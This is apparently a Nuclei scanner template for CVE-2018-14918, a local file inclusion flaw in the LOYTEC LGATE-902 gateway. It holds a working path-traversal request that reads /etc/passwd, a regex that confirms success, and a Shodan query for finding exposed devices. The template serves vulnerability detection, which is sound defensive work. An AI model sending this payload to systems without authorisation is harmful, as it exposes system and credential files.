40 lines
1.3 KiB
YAML
40 lines
1.3 KiB
YAML
id: CVE-2018-14918
|
|
|
|
info:
|
|
name: LOYTEC LGATE-902 6.3.2 - Local File Inclusion
|
|
author: 0x_Akoko
|
|
severity: high
|
|
description: |
|
|
LOYTEC LGATE-902 6.3.2 is susceptible to local file inclusion which could allow an attacker to manipulate path references and access files and directories (including critical system files) that are stored outside the root folder of the web application running on the device. This can be used to read and configuration files containing, e.g., usernames and passwords.
|
|
reference:
|
|
- https://seclists.org/fulldisclosure/2019/Apr/12
|
|
- http://packetstormsecurity.com/files/152453/Loytec-LGATE-902-XSS-Traversal-File-Deletion.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-14918
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2018-14918
|
|
cwe-id: CWE-22
|
|
metadata:
|
|
shodan-query: http.html:"LGATE-902"
|
|
verified: "true"
|
|
tags: loytec,lfi,seclists,packetstorm,cve,cve2018,lgate
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by mp on 2022/07/07
|